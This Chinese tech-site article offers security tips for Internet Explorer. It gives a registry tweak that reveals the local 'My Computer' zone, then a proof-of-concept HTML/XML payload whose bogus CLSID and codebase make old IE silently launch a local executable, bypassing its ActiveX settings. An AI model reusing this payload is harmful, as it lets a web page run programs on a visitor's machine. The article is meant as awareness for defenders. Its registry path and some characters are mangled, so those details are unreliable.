您的位置：極速下載站→ 資訊首頁 → 其他資訊 → 網(wǎng)絡(luò)資訊 → IE防黑技巧十則，讓你綠色上網(wǎng)更安全《四》

IE防黑技巧十則，讓你綠色上網(wǎng)更安全《四》

時間：2019-09-07 15:32:21 作者：Mesa 瀏覽量：53

圖一 IE防黑技巧十則，讓你綠色上網(wǎng)更安全《四》

Internet Explorer 8.0 XP 8.0 官方中文版...
大�。�16.11 MB
日期：2019/9/7 15:34:16
環(huán)境：WinXP,

核心提示：針對IE的惡意修改、攻擊方法非常多，本文中介紹的十種反黑技巧，一定會對你有所幫助。

針對IE的惡意修改、攻擊方法非常多，本文中介紹的十種反黑技巧，一定會對你有所幫助。

下面是具體的方法：打開“開始”菜單中的“運(yùn)行”，在彈出的“運(yùn)行”對話框中輸入Regedit.exe，打開注冊表編輯器，點(diǎn)擊前面的“+”號順次展開到：HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settingsones，在右邊窗口中找到DWord值“Flags”，默認(rèn)鍵值為十六進(jìn)制的21（十進(jìn)制33），雙擊“Flags”，在彈出的對話框中將它的鍵值改為“1”即可，關(guān)閉注冊表編輯器。無需重新啟動電腦，重新打開IE，再次點(diǎn)擊“工具→Internet選項(xiàng)→安全”標(biāo)簽，你就會看到多了一個“我的電腦”圖標(biāo)，在這里你可以對IE的本地安全進(jìn)行配置。

圖二 IE防黑技巧十則，讓你綠色上網(wǎng)更安全《四》

這個小技巧有什么用呢？把下面的代碼保存為一個html文件，然后運(yùn)行試試就知道了：

注意：請把<；替換為向左的尖括號，把>；替換為向右的尖括號。

<；span datasrc=\"#oExec\" datafld=\"exploit\" dataformatas=\"html">；<；/span>；

<；xml id=\"oExec\">；

<；security>；

<；exploit>；

<；！[CDATA[

<；object id=\"oFile\"

classid=\"clsid：88888888-8888-8888-8888-888888888888"

codebase=\"c：/winnt/system32/calc.exe">；<；/object>；

]]>；

<；/exploit>；

<；/security>；

<；/xml>；

運(yùn)行上面的html文件，會打開你的計(jì)算機(jī)中c：/winnt/system32文件夾下的calc.exe文件！而且IE沒有任何提示！即使在IE的安全設(shè)置中禁用ActiveX控件上述代碼也能工作！如果不是calc.exe文件而是其他惡意文件又會怎么樣？如果是在你瀏覽的網(wǎng)頁中含有類似上面的代碼又會怎么樣？真危險��！

圖三 IE防黑技巧十則，讓你綠色上網(wǎng)更安全《四》

之所以會這樣是由于IE存在兩個可怕的漏洞：可本地執(zhí)行任意命令，IE的ActiveX安全設(shè)置可被繞過。在上述代碼中我們給IE指定了一個系統(tǒng)中并不存在的控件號（\"clsid：88888888-8888-8888-8888-888888888888），IE會試圖從codebase指定的地址去下載并安裝改控件。根據(jù)codebase于是IE找到了c：/winnt/system32/calc.exe，接著IE開始“下載”并安裝該程序。由于calc.exe是EXE文件，這樣就等于是在運(yùn)行該文件，所以calc.exe就被運(yùn)行了！